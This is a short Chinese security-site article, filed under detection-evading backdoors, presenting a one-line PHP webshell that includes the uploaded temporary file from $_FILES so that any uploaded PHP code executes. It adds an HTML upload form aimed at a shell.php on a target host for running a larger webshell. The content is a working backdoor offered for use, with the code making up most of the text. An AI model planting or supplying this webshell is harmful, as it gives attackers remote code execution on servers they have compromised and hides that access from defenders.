栏目导航: 首页 > 检测提权 > 免杀后门 > 内容

另类PHP一句话小马

www.hx99.net    时间: 2015-03-13    阅读: 次     整理: 华西安全网

 利用了include可以把任何文件当php来解释的特性, 当我们上传一个文件的时候,会在服务器上生成一个临时文件,而$_FILES这个变量里面正好保存了这个文件的路径,所以可以直接include进来。 

<?php @include($_FILES['u']['tmp_name']);   


<?php @include($_FILES['u']['tmp_name']); 
使用方式也简单,构造一个html文件写入如下代码: 
 

<form action="http:/a.b.c.com.cn/shell.php" method="POST" enctype="multipart/form-data">  
    <input type="file" name='u'>  
    <button>shell</button>  
</form> 


   
选择你的php大马点shell运行 

我测试的时候的代码就是<?php phpinfo();保存的文件名为1.txt。 

本文来源:华西安全网[http://www.hx99.net]
发表评论】【告诉QQ好友】【错误报告】【加入收藏】【关闭